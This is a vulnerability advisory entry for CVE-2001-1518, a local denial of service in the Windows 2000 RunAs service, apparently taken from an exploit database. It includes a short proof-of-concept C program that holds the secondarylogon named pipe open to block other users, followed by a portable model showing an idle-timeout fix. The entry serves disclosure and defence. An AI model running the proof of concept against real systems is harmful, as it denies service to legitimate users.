Microsoft Windows 2000 RunAs Service Denial of Service Vulnerability

Vulnerability ID: 1106539
Vulnerability type: Design error
Published: 2001-12-11
Updated: 2005-10-20
CVE ID: CVE-2001-1518
CNNVD-ID: CNNVD-200112-200
Platform: Windows
CVSS score: 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/21099
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-200
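|Vulnerability details
RunAs (runas.exe) in Windows 2000 creates only one session instance at a time. A local user can cause a denial of service (RunAs hangs) by creating a named pipe session with the authentication server without making any service request.
|Exploit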
source: http://www.securityfocus.com/bid/3291/info

The Windows 2000 RunAs service allows an application or service to be executed as a different user. It is accessed by holding down the Shift key, right-clicking an icon, and then selecting 'Run as...' from the context menu.

When the service is invoked, it creates a named pipe session with the specified server for authentication of credentials. The RunAs service only allows one instance of this session at a time. If a client were to create this pipe on the server without requesting any service, other clients would be unable to connect to this service. 

// radix1112200103.c - Camisade - Team RADIX - 11-12-2001
//
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.

#define WIN32_LEAN_AND_MEAN
#define UNICODE
#define _UNICODE

#include <windows.h>
#include <tchar.h>

#include <stdio.h>
#include <conio.h>

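// Escaped path of the named pipe used by the RunAs (secondary logon) service.
#define SECLOGON_PIPE   _T("\\\\.\\pipe\\secondarylogon")


int main(void)
{
   HANDLE hPipe;

   // Open the existing pipe and send no request. The service allows only
   // one session at a time, so it stays occupied while this handle is open.
   hPipe = CreateFile(SECLOGON_PIPE, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
   if (hPipe == INVALID_HANDLE_VALUE)
   {
      printf("Unable to open pipe, error %lu\n", GetLastError());
      return 1;
   }

   printf("Connected to pipe.  Press any key to disconnect.\n");
   _getche();

   CloseHandle(hPipe);
   return 0;
}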
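
An added example, not part of the original advisory and not the RunAs service's code: a portable C model of the single-session design described above, with a Unix-domain socket pair standing in for the named pipe. The function names, the "logon"/"OK" messages and the 200 ms idle limit are assumptions; the point is that bounding how long a silent client may hold the slot lets the next client be served.

```c
#include <poll.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Handle the client that currently holds the single service slot.
 * idle_ms < 0 waits forever for a request (the flawed behaviour);
 * idle_ms >= 0 drops a client that stays silent that long.
 * Returns 1 if a request was answered, 0 if the client was dropped. */
static int serve_slot(int fd, int idle_ms)
{
    struct pollfd p = { .fd = fd, .events = POLLIN };
    char req[64];
    int served = 0;

    if (poll(&p, 1, idle_ms) > 0 && read(fd, req, sizeof req) > 0)
        served = (write(fd, "OK", 2) == 2);
    close(fd);              /* free the slot either way */
    return served;
}

/* Constructed scenario: client A connects and sends nothing, client B
 * connects afterwards with a request. Returns 1 if B got its reply. */
int second_client_served(int idle_ms)
{
    int a[2], b[2];
    char reply[3] = {0};

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, a) < 0) return -1;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, b) < 0) return -1;
    if (write(b[1], "logon", 5) != 5) return -1;  /* B's request is queued */

    int a_served = serve_slot(a[0], idle_ms);     /* A holds the slot first */
    int b_served = serve_slot(b[0], idle_ms);
    ssize_t n = read(b[1], reply, 2);

    close(a[1]);
    close(b[1]);
    return !a_served && b_served && n == 2 && strcmp(reply, "OK") == 0;
}

int main(void)
{
    /* A 200 ms idle limit lets B through; -1 here would never return. */
    return second_client_served(200) == 1 ? 0 : 1;
}
```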
|References

Source: BID
Name: 3291
Link: http://www.securityfocus.com/bid/3291
Source: XF
Name: win2k-runas-dos(7533)
Link: http://www.iss.net/security_center/static/7533.php
Source: BUGTRAQ
Name: 20011114 RE: Radix Research Reports RADIX1112200101, RADIX1112200102, and RADIX1112200103
Link: http://cert.uni-stuttgart.de/archive/bugtraq/2001/11/msg00100.html
